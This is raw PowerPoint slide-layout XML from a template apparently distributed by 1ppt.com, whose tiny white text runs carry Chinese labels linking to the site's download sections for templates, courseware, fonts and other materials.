              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout93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93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93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93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9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94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94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94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94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94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94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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout94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94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94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94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9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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout95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95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95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95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95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95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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
